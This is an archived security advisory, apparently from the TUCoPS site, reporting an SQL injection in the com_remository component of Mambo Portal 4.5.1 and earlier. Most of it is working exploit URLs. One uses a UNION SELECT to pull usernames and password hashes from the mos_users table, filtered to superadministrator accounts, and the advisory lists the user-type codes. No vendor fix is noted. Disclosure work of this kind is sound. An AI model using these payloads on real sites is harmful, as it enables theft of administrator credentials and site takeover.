TUCoPS :: Web :: CMS / Portals :: hack2291.htm

Mambo Portal lasted version 4.5.1 (1.09) and lower vesion : SQL injection Vulnerability.
Mambo Portal lasted version 4.5.1 (1.09) and lower vesion : SQL injection Vulnerability. 



Vendor

www.mamboportal.com 

Message from vendor : Mambo is one of the most powerful Open Source Content Management Systems on the planet. It is used all over the world for everything from simple websites to complex corporate applications. Mambo is easy to install, simple to manage, and reliable. 



Bug name : SQL injection

Version : lastest Version 4.5.1(1.0.9) and lower.



Exploit :



http://www.mamboportal.com/index.php?option=com_remository&Itemi d=27&func=fileinfo&parent=folder&filecatid=499%20and%201=0[SQL]/*



You can exploit from the table "mos_users" with the query below



http://www.mambosite.com/index.php?option=com_remository&Itemid= [id]&func=selectfolder&filecatid=[id]%20and%201=0%20union%20all%20select%201,2,3,4,username,6,password,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20from%20mos_users%20where%20usertype=0/*



with the values of usertype : 

 0 = superadministrator

 1 = administrator

 2 = editor

 3 = user

 5 = publisher

 6 = manager



Vendor feedback :

Not yet



Vendor patch :

Not yet



khoai

www.xfrog.org

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH